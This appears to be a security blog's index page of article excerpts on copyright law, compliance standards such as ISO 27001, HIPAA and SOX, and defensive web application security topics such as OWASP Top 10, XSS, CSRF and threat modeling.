Menu

The Copyright Act provides by default legal protection to the content owner for restricting or authorizing others to reuse Copyright protected material. Although the owner has exclusive ownership on his contents but still the Copyright is subject to certain limitations as defined in sections 107 through 118 of the copyright law (title 17, U. S. Code).

WordPress is very well organized from usability perspective and most of known vulnerabilities are also fixed in timely manner. We need to ensure that we keep updating the WordPress using Admin panel that is one click process but still there are many external factors that influence the overall security of WordPress site. Let's walk through the generic security guidelines and look at few configuration settings to lock down WordPress.

As part of SEO strategy we consider how search engines work, what people search for, the relevance of search terms or keywords typed into search engines and which search engines are preferred by their targeted audience. Improving Site ranking is a gradual process of generating authentic contents, identify relevant keywords and using those keywords effectively while building new contents, promoting site using backlinks or inbound links and remov...

List of security testing tools that can be used for Auditing and Scanning of Web Site. Few of them are available as open source as part of OWASP project.

PCI DSS (Payment Card Industry Data Security Standard) was defined by the Payment Card Industry Security Standards Council to increase controls around cardholder’s data and to reduce credit card frauds. The compliance can be verified by an external Qualified Security Assessor (QSA) or by Self-Assessment Questionnaire (SAQ) for companies handling smaller volume of transactions.

The Data Protection Act 1998 requires every data controller who is processing personal information in an automated form to notify, unless they are exempt. Failure to notify is a criminal offence. Register entries have to be renewed annually. If you are required to notify but don’t renew your registration, you are committing a criminal offence.

Following are the key Meta tags and best practice for Secure HTML generation which allows the best use of Browser specific security features and make client side environment more secure. Most of settings are nothing but minor server side tweaks to correctly generate security sensitive meta tags or optimial handeling of other client side elements like Cookie & Cache.

The SQL Injection is used by malicious users to attack your application surface in legitimate manner to exploit weakness in the coding pattern especially how the application interact with the Database. The purpose of attack could be to get unauthorized access to sensitive data especially for other users and accounts. In some cases if such vulnerability exists then using attacks like Command Injections, the attacker may tak...

Cross Site Scripting (XSS) is the act of injecting malicious scripts or other HTML code into a web page that runs on the client browser and cause damage to your web site users. Mostly it works with the trusted user input (e.g. feedback comments) and when such information is rendered as part of web page HTML without validating the user provided contents thus all other users who visit this web page may become victom of XSS attack.

Threat Modeling is Risk Analysis Exercise that can be applied to not only a software product but to any asset that is valuable to your organization.

This is an iterative exercise and it may not be possible to ensure 100% coverage or do it 100% correct in first go. Ideally you should start by protecting outer trust boundry and then continue securing internal layers and sub-components of your application.


Copyright And Plagiarism


The Safe Harbor Provision of DMCA (Digital Millennium Copyright Act) protects the online service providers like ISP, Search engines and content providers like YouTube from Copyright infringement liability, provided they meet specific guidelines defined under Online Copyright Infringement Liability Limitation Act (“OCILLA”), DMCA Title II. The primary objective of Safe Harbor Provision is to protect such service provid...

There are many tools and online services available now that maintains huge repository of published contents including books. Most of these are paid services but may be very useful for Publishers and such content writers who produce original contents for financial purpose. It is also possible to use search engine like Google to search for duplicate contents manually that may produce more accurate results but may involve too much efforts.

In non-technical terms Plagiarism is the act of stealing the credit of work done by others by producing new contents that are either taken directly from other’s Work in complete or partially used, or taking core material from other’s work and reproducing same with restructuring or rephrasing the contents but not giving the credit to the original Author of Work. Plagiarism act by nature is considered non-ethical but not defined as l...

Copyright is a legal protection provided by the U.S. law (title 17) to the authors of “original works of authorship”, including literary, dramatic, musical, artistic, and certain other intellectual works. Copyright law protects both published & unpublished works provided you may prove that you are the original author of work/content.


Cyber Security Compliance Standards


Collectively the ISO 27000 series consists of 9 standards (27001-27010) and each of them provided for specific focus on specific function. In addition other 6 standards are defined to focus on related domains e.g. telecom, BCP, Network & Application Security etc.

The United States Department of Defense (DoD) introduced DoD Information Assurance Certification and Accreditation Process (DIACAP) as a risk management standard for to apply on Department of Defense Information Systems. DIACAP defines a set of activities and structural process for the certification and accreditation (C&A) of DoD Information Systems and it is applied throughout the system’s life cycle.

Where to use COBIT Framework?
COBIT may be evaluated under two different contexts. It provides a generic Process Framework that can be used to comply with global standards like SOX, ISO 27001, ITIL or PMBOK etc. At the same time COBIT Framework defines very specific and detailed framework to plan, execute, control and measure all IT enabled initiatives & services in your organization. Many organizations have been using COBIT...

What is HIPAA and Privacy & Security Rules?
HIPAA is The Health Insurance Portability and Accountability Act. U.S. Department of Health & Human Services (HHS) published HIPAA Privacy Rule and HIPAA Security Rule to define regulatory standard for protecting the privacy & security of health information data.

Federal Information Security Management Act (FISMA) is part of the E-Government Act (Title III) that requires each U.S. federal agency to develop, document, and implement an agency-wide program to provide information security for the information and information systems that support the operations and assets of the agency, including those provided or managed by another agency, contractor, or other source.

Statement on Auditing Standards No. 70: Service Organizations, commonly abbreviated as SAS 70 is an auditing statement issued by the Auditing Standards Board of the American Institute of Certified Public Accountants (AICPA) with its content codified as AU 324. SAS 70 provides guidance to service auditors when assessing the internal control of a service organization and issuing a service auditor’s report. SAS 70 also provides guidance to auditors ...

Sarbanes Oxley Act (SOX) is a United States legislation enacted in response to the high-profile financial scandals to protect shareholders and the general public from accounting errors and fraudulent practices in the enterprise. The act contains 11 titles, or sections, ranging from additional corporate board responsibilities to criminal penalties, and requires the Securities and Exchange Commission (SEC) to implement rulings on requirement...


Web Application Security


Broken Authentication and Session Management – OWASP definition

"Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, session tokens, or exploit other implementation flaws to assume other users’ identities."

The Insecure Direct Object References represent the flaws in system design where access to sensitive data/assets is not fully protected and data objects are exposed by application with assumption that user will always follow the application rules. For example let’s take a scenario where an financial data report displayed to an user who is authorized to see his personal/organization’s financial data report but not expected to see other users/organ...

Cross-Site Request Forgery (CSRF) is a way to perform an malicious action by tricking legitimate web site users and using an valid user context to pass an malicious request to web server. Because the request is originated under a valid user context, web server failed to validate malicious intent and execute user request with full trust thus allow attacker to exploit any weakness in server side environment.

The Microsoft Security Assessment Tool (MSAT) is a risk-assessment application designed to provide information and recommendations about best practices for security within an information technology (IT) infrastructure.

UrlScan works as an ISAPI filter on Microsoft Internet Information Services (IIS) and protect IIS by restricts the malicious HTTP requests. When properly configured, UrlScan is effective at reducing the exposure of IIS to potential Internet attacks.

Overview
ModSecurity is a web application firewall engine that provides very little protection on its own. In order to become useful, ModSecurity must be configured with rules. In order to enable users to take full advantage of ModSecurity out of the box, Trustwave’s SpiderLabs is providing a free certified rule set for ModSecurity 2.x. Unlike intrusion detection and prevention systems, which rely on signatures specific to ...

The OWASP AntiSamy project is available in versions for Java & .Net respectively. It’s an API that helps you make sure that clients do not supply malicious cargo code in the HTML they supply for their profile, comments, etc. that gets persisted on the server.

ESAPI (The OWASP Enterprise Security API) is a free, open source, web application security control library that makes it easier for programmers to write lower-risk applications. The ESAPI libraries are designed to make it easier for programmers to retrofit security into existing applications.

Overview The Microsoft Baseline Security Analyzer (MBSA) provides a streamlined method to identify missing security updates and common security misconfigurations.
To easily assess the security state of Windows machines, Microsoft offers the free Microsoft Baseline Security Analyzer (MBSA) scan tool. MBSA includes a graphical and command line interface that can perform local or remote scans of Microsoft Windows systems.

About OWASP Top 10 Project OWASP Top 10 project was launched in 2003 to understand the top security risks & vulnerabilities associated with the Web Applications. The outcome of the project is the list of top 10 Threats & Vulnerabilities as found common across the globe. The Top 10 project is now referenced by many organizations and compliance groups including MITRE, PCI DSS, DISA and FTC. The latest version was released in 2010...

The below section enlist the common attacks applicable to most of web applications and must be considered. For a business critial application the checks & balances should be much more exaustive that can be identified with formal Threat Modeling exercise.

DREAD is a risk rating model that is used in Threat Modeling exercise.
Using DREAD Risk Rating Model along with STRIDE Model can be very helpful in understanding Threat influence and to priotize threats based on Risk Value assigned to each threat using DREAD Model.

STRIDE Model is recommended by Microsoft to analyze web application threats by allocating each threat under six different categories. STRIDE Model and Data Flow Diagrams can be used very effectively during Threat Modeling exercise.

Data Flow Diagram can be used effectively during Threat Modeling exercise. We first create high level DFDs and break further to clarify the context.

Think about Threat Modeling as the process to understand what all assets you need to protect, from whom you need to protect, how you protect, what is the implementation priority and what risk you live with if few of threats are not included in implementation scope.